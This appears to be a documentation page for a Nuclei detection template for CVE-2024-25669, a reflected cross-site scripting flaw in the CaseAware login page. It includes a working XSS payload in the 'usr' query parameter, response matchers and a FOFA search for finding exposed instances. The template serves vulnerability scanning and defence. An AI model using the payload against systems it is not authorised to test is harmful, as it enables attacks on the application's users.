CaseAware a360inc - Cross-Site Scripting
ID: CVE-2024-25669
Severity: medium
Author: r3naissance
Tags: cve,cve2024,xss,caseaware,a360inc
Description
Section titled “Description”a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in 2017
YAML Source
Section titled “YAML Source”id: CVE-2024-25669
info: name: CaseAware a360inc - Cross-Site Scripting author: r3naissance severity: medium description: | a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in 2017 impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement remediation: | To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-25669 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-25669 cwe-id: CWE-79 epss-score: 0.00286 epss-percentile: 0.65504 cpe: cpe:2.3:a:a360inc:caseaware:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: a360inc product: caseaware fofa-query: - title="CaseAware" - title="caseaware" tags: cve,cve2024,xss,caseaware,a360inc
http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"
matchers-condition: and matchers: - type: word part: body words: - "value='test' draggable=true ondrag=alert(document.domain)" - "CaseAware" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100a35d7f800c2714aee7b60866bf5c1ddcfd611196509119b6c310980bbf67e8ab02204cee138c2007af8aee0fe41e146632288c9c2c152c4db124f2e0c0ac9fd252bf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-25669.yaml"